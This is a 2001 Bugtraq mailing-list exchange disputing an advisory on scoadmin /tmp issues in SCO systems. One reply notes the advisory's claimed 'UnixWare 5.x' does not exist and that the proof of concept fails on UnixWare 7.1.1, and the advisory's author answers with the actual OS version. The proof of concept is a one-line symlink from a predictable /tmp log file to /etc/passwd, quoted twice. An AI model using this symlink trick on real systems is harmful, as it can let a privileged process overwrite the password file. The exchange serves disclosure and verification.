[20749] in bugtraq
Re: [SRT2001-10] - scoadmin /tmp issues
daemon@ATHENA.MIT.EDU (KRFinisterre@checkfree.com)
Wed May 23 21:01:08 2001
To: Matt Schalit <mschalit@pacbell.net>
Cc: bugtraq@securityfocus.com, "Recon@Snosoft. Com" <recon@snosoft.com>,
Richard Johnson <thief@snosoft.com>
Message-ID: <OF4DD154DD.879E2C4A-ON85256A55.00626F1A@ckfr.com>
From: KRFinisterre@checkfree.com
Date: Wed, 23 May 2001 13:56:35 -0400
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii
I am sorry, it was a typo. The OS is as follows.
SCO_SV unixdev 3.2 5.0.5 i386
$ ln -s /etc/passwd /tmp/tclerror.1195.log
$ ls -al /tmp/tclerror.1195.log
lrwxrwxrwx 1 kevin supp 11 May 23 13:47 /tmp/tclerror.1195.log -> /etc/passwd
Matt Schalit <mschalit@pacbell.net>
05/23/01 01:39 PM
To: Richard Johnson <thief@snosoft.com>
cc: bugtraq@securityfocus.com, "Recon@Snosoft. Com" <recon@snosoft.com>
Subject: Re: [SRT2001-10] - scoadmin /tmp issues
Hello Sir:
Richard Johnson wrote:
>
> ======================================================================
> Strategic Reconnaissance Team Security Advisory(SRT2001-09)
> Topic: scoadmin /tmp issues
> Vendor: Santa Cruz Operations
> Release Date: 05/07/01
> ======================================================================
[snip...]
> .: Systems Affected
> Unixware 5.x
You bring to light various issues with software issued by the
"Santa Cruz Operations" (sic). I'm sure they would prefer that
you call them by their correct name, the Santa Cruz Operation, or
simply SCO.
The SCO server division has been acquired by Caldera, and
www.sco.com now points you to Caldera, for those of you who
may not know.
SCO has two OS lines that have the following release history:
UnixWare                      OpenServer
------------------            --------------------------
...                           ...
Unixware 2.1.2                Unix System 5 Release 3.2v4.0
Unixware 2.1.3                Unix System 5 Release 3.2.4.2
Unixware 7.0.0                OpenServer 5.0.0
Unixware 7.0.1                OpenServer 5.0.2
Unixware 7.1.0                OpenServer 5.0.4
Unixware 7.1.1 <-- Current    OpenServer 5.0.5
                              OpenServer 5.0.6 <--- Current.
I spent about 15 minutes searching the net and the ng's for any reference
to a "UnixWare 5" or a "UnixWare 5.x" that you refer to with no success.
Would you please clarify for the rest of us exactly what OS you
see this problem with. Please include the output of
uname -a
> .: Proof of Concept
> ln -s /etc/passwd /tmp/tclerror.1195.log
This doesn't work on UnixWare 7.1.1.
$ ln -s /etc/passwd /tmp/tclerror.1195.log
UX:ln: ERROR: Cannot create /tmp/tclerror.1195.log: Not privileged
Regards,
Matthew Schalit
SCO ACE, Maintainer of the Uw7 FAQ.